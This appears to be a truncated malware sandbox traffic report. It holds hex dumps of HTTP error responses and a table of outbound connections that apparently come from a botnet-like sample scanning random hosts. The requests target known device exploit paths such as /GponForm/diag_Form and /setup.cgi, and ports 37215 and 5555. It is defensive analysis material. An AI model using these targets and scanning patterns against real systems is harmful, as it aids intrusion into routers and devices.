bb b4 11 dc 95 73 8e 6b c1 90 34 93 13 a1 84 13 54 12 cb a8 dc 3f 2c 85 7a 04 83 72 1e 59 b7 93 68 4b 44 17 81 e0 f3 88 15 8b b0 44 98 b5 11 94 06 8b 79 14 33 ae 08 5b 8a 38 6c c5 15 15 6a d8 ec bb 5d 8d ad 99 9a 79 85 5c d0 79 64 99 41 54 27 b5 d1 0f c8 9c d0 aa 79 76 30 48 2d 33 a2 76 c0 b1 40 03 d6 b0 79 e4 ed 67 67 71 4c 6b 31 34 94 53 33 64 7b 4f 0e 99 ae e2 1c 29 d3 6a f8 60 a3 2c 8d c3 fd 6c 90 c6 2d 37 72 cd 77 d9 00 20 e5 62 dd 2a 40 36 86 d6 35 9a c8 af b7 3b 2d ef 58 41 a8 44 e3 a0 1b 10 34 46 1b 3f 65 5a 3f 0a 6c e7 a5 e0 1c 55 6b 91 b0 d1 1c 8f 80 53 47 89 33 54 59 49 1d 7a f2 d2 5c e2 22 1c b2 51 76 2b 91 5a 84 b0 0c ed f2 30 8d b9 58 f7 c4 69 05 6d 1e 23 1c 1d 15 d2 fb 3e 08 59 93 51 2b ba 8f 42 a4 1c 4d b7 55 6d 09 5d 39 0d b5 23 c9 08 e4 72 56 3b 32 69 fe b7 64 0a 1b 32 3e 6b 56 37 a4 58 49 09 55 4e 92 73 a0 ca fb 5f 50 8b 7c 0f db 20 27 1d aa 50 52 28 24 b9 d4 ec 11 2a 3e 6b 07 86 8c fd ac ca c9 18 0a ad 1c 91 62 59 3a f0 ce 26 93 91 df 6a 86 a7 5b 19 d6 72 49 d9 23 e1 d4 3c 82 44 ca 85 5a 12 e7 6f f4 5f 05 48 6d 4d d5 b1 19 bd 25 a2 ec da ff a5 b1 3f 72 7c 29 4b 46 a3 d3 a3 cd 34 2e 93 fe b4 81 7f 51 b1 b2 15 ce d0 1d 11 3c a8 56 69 a5 83 16 c9 b9 b7 60 33 b4 95 1f 76 ba 18 94 74 eb 6d f8 1b dd c1 cd bb 19 4c f8 19 9d 9c 5f e4 13 c6 a6 6f 92 d3 0b 78 9d af a4 bc 3c 96 f0 fb 8b 34 1e 8d c7 64 94 90 f1 14 92 f1 ec fc cd 6c f4 06 ee ef ae 9e 8a 92 96 e3 4e 8e 06 6d e9 df 9b 8c 46 7b 7f 25 c3 53 d8 3b b5 7b 73 bc 95 3d ff 47 2f 26 e2 34 2e c7 7b ee c6 81 bc d9 a0 5b b0 21 19 74 32 1c f1 b5 65 77 95 93 69 47 ea 03 f2 ec 63 67 53 52 47 4a 1f e5 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 6d4a657b98069274-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 33 Data Ascii: error code: 1003
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 daeeb7c460b443acd6ac3d0db8e793a8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: TPE52-C1X-Amz-Cf-Id: rT_EXyjGCrOYN6jK3oiEJBLgPD5vlbz5rYP3i1_hLi-jGrIW7R2C1Q==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 72 54 5f 45 58 79 6a 47 43 72 4f 59 4e 36 6a 4b 33 6f 69 45 4a 42 4c 67 50 44 35 76 6c 62 7a 35 72 59 50 33 69 31 5f 68 4c 69 2d 6a 47 72 49 57 37 52 32 43 31 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 211Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 65 74 75 70 2e 63 67 69 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /setup.cgion this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Microsoft-IIS/10.0Date: Fri, 28 Jan 2022 12:59:22 GMTContent-Length: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 28 Jan 2022 13:00:07 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 28 Jan 2022 13:00:31 GMTContent-Type: application/json; charset=UTF-8Connection: closeX-Powered-By: PHP/7.4.27Access-Control-Allow-Origin: *Access-Control-Expose-Headers: X-Set-Token, X-Pagination-Total-Count, X-Pagination-Current-Page, X-Pagination-Page-Count, X-Pagination-Per-Page, DateX-Request-Id: 9d06b78bea2708d7e8e3bc7ac0321d13d3c8de1c6e6fb6477d83ef094784b472Set-Cookie: SERVERID=w02-8888; path=/Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 22 2c 22 63 6f 64 65 22 3a 30 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 70 72 65 76 69 6f 75 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 49 6e 76 61 6c 69 64 20 52 6f 75 74 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 55 6e 61 62 6c 65 20 74 6f 20 72 65 73 6f 6c 76 65 20 74 68 65 20 72 65 71 75 65 73 74 20 5c 22 73 65 74 75 70 2e 63 67 69 5c 22 2e 22 2c 22 63 6f 64 65 22 3a 30 7d 7d Data Ascii: {"name":"Not Found","message":"Page not found.","code":0,"status":404,"previous":{"name":"Invalid Route","message":"Unable to resolve the request \"setup.cgi\".","code":0}}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:28 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.10Date: Fri, 28 Jan 2022 13:00:37 GMTContent-Type: text/htmlContent-Length: 154Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.10</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 295Date: Fri, 28 Jan 2022 13:00:45 GMTData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 3c 2f 63 6f 64 65 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Not Found</h1><h2>The requested URL <code>/GponForm/diag_Form</code> was not found on this server.</h2><h2></h2></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:51 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeContent-Type: text/htmlData Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Fri, 28 Jan 2022 16:03:05 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 13:57:26.620692015 CET	42836	443	192.168.2.23	91.189.91.43
Jan 28, 2022 13:57:27.132208109 CET	42516	80	192.168.2.23	109.202.202.202
Jan 28, 2022 13:57:31.706192017 CET	38710	80	192.168.2.23	45.134.0.236
Jan 28, 2022 13:57:31.706391096 CET	44492	8443	192.168.2.23	113.200.105.232
Jan 28, 2022 13:57:31.706393003 CET	41188	5555	192.168.2.23	67.129.160.73
Jan 28, 2022 13:57:31.706449986 CET	56336	8443	192.168.2.23	184.11.167.170
Jan 28, 2022 13:57:31.706481934 CET	36632	5555	192.168.2.23	109.102.232.127
Jan 28, 2022 13:57:31.706494093 CET	52370	80	192.168.2.23	105.61.103.103
Jan 28, 2022 13:57:31.706506968 CET	40794	37215	192.168.2.23	166.31.23.109
Jan 28, 2022 13:57:31.706533909 CET	50012	8443	192.168.2.23	35.45.112.6
Jan 28, 2022 13:57:31.706573963 CET	59028	8080	192.168.2.23	22.144.232.185
Jan 28, 2022 13:57:31.706665039 CET	41930	8080	192.168.2.23	100.196.47.140
Jan 28, 2022 13:57:31.706712961 CET	53480	80	192.168.2.23	215.43.78.87
Jan 28, 2022 13:57:31.706770897 CET	47108	80	192.168.2.23	86.26.124.100
Jan 28, 2022 13:57:31.706784010 CET	56300	80	192.168.2.23	220.130.213.29
